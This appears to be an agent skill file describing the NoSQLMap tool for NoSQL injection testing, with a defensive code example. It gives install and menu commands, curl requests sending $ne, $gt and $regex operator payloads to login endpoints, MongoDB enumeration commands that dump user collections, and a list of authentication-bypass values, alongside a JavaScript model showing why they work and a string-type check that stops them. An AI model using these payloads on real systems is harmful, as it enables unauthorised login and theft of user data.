offensive-tools/vuln-scanners/nosqlmap/SKILL.md
Auth/lab ref: automated NoSQL injection detection and exploitation tool targeting MongoDB, CouchDB, and other NoSQL databases.
Automated NoSQL injection and exploitation — MongoDB, CouchDB, server-side JS injection.
```bash
git clone https://github.com/codingo/NoSQLMap
cd NoSQLMap && python3 setup.py install

# Launch interactive menu
python3 nosqlmap.py

# Or direct web app attack
python3 nosqlmap.py --attack 3
```

```text
Main Menu:
1 - Set options (target, port, URI)
2 - NoSQL DB Access Attacks      # Direct DB connection exploits
3 - NoSQL Web App Attacks        # HTTP injection via web app
4 - Scan for Anonymous MongoDB Access
x - Exit
```

```text
Set options first:
1 - Set target host: target.com
2 - Set web app port: 443
3 - Set URI: /api/login
4 - Set HTTP method: POST
5 - Set POST data: {"username":"admin","password":"test"}
6 - Set parameter to attack: password

Then run:
3 - Assess NoSQL injections      # Test all injection types
4 - MongoDB injection            # Focused MongoDB test
```
| Technique | Payload | Effect |
|-----------|---------|--------|
| Auth Bypass | `{"$ne": "invalid"}` | Matches anything != value |
| Auth Bypass | `{"$gt": ""}` | Matches anything > empty |
| Regex | `{"$regex": ".*"}` | Matches all via regex |
| Where | `{"$where": "1==1"}` | Server-side JS eval |
| Array | `["admin", "user"]` | Array injection |
```bash
# JSON body — auth bypass
curl -s -X POST https://target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$ne": "wrongpass"}}'

# URL parameter — array injection
# Single quotes stop the shell expanding $ne; -g stops curl treating [] as a glob
curl -g 'https://target.com/api?user[$ne]=invalid'

# PHP-style param array
curl -g 'https://target.com/api?user[$regex]=.*&password[$ne]=invalid'
```
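Why the operator payloads above authenticate, and the type check that stops them, seen from the server side. This is an added example, not code from NoSQLMap or from the original skill: `matches` models only a small subset of MongoDB operator semantics, and the user record, in-memory store and function names are constructed for illustration.

```javascript
// Added example. Constructed record; plaintext password only to keep the model short.
const USERS = [{ username: "admin", password: "S3cret-constructed" }];

// Small subset of MongoDB filter semantics: equality, $ne, $gt, $gte, $regex.
function matches(value, cond) {
  if (cond === null || typeof cond !== "object" || Array.isArray(cond)) {
    return value === cond;
  }
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case "$ne": return value !== arg;
      case "$gt": return value > arg;
      case "$gte": return value >= arg;
      case "$regex": return new RegExp(arg).test(value);
      default: throw new Error("operator not modelled: " + op);
    }
  });
}

function findUser(filter) {
  const hit = USERS.find(u =>
    Object.entries(filter).every(([field, cond]) => matches(u[field], cond)));
  return hit || null;
}

// Vulnerable: parsed request values become the filter, so objects act as operators.
function loginVulnerable(body) {
  return findUser({ username: body.username, password: body.password });
}

// Hardened: each credential must be a string before it reaches the query.
function loginHardened(body) {
  for (const field of ["username", "password"]) {
    if (typeof body[field] !== "string") {
      return { ok: false, reason: field + " must be a string" };
    }
  }
  const user = findUser({ username: body.username, password: body.password });
  return { ok: user !== null, reason: user ? "match" : "bad credentials" };
}

// Lists every "$"-prefixed key in a parsed body, for logging or alerting.
function findOperatorKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  return Object.entries(value).flatMap(([key, child]) => {
    const here = path ? path + "." + key : key;
    return (key.startsWith("$") ? [here] : []).concat(findOperatorKeys(child, here));
  });
}
```

The same check applies to query strings: some frameworks' query parsers turn bracketed parameters such as `user[$ne]=invalid` into nested objects, so the value reaching the handler is not guaranteed to be a string.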
Requires network access to MongoDB port (27017):
```bash
# Anonymous access scan (no creds required)
python3 nosqlmap.py --attack 4 --rhost 10.0.0.1

# Enumerate databases on open MongoDB
mongo --host target.com --port 27017
> show dbs
> use admin
> show collections
> db.users.find()
```
| Flag | Purpose |
|------|---------|
| `--attack <n>` | Attack mode: 2=DB access, 3=web app, 4=anon scan |
| `--rhost <host>` | Target host |
| `--rport <port>` | Target port (default: 27017 for MongoDB) |
| `--webPort <port>` | Web app port (default: 80) |
| `--uri <path>` | Web URI path |
| `--httpMethod <m>` | GET or POST |
| `--postData <data>` | POST body |
| `--injectedParam <p>` | Parameter to inject |
| `--verbose` | Verbose output |
```javascript
// Login forms — try these as password values:
{"$ne": null}
{"$ne": "x"}
{"$gt": ""}
{"$gte": ""}
{"$regex": ".*"}
{"$where": "1==1"}

// Username + password bypass combo:
// username: admin, password: {"$ne": "x"}
// username: {"$regex": "admin.*"}, password: {"$ne": "x"}
```
references/nosql-payloads.md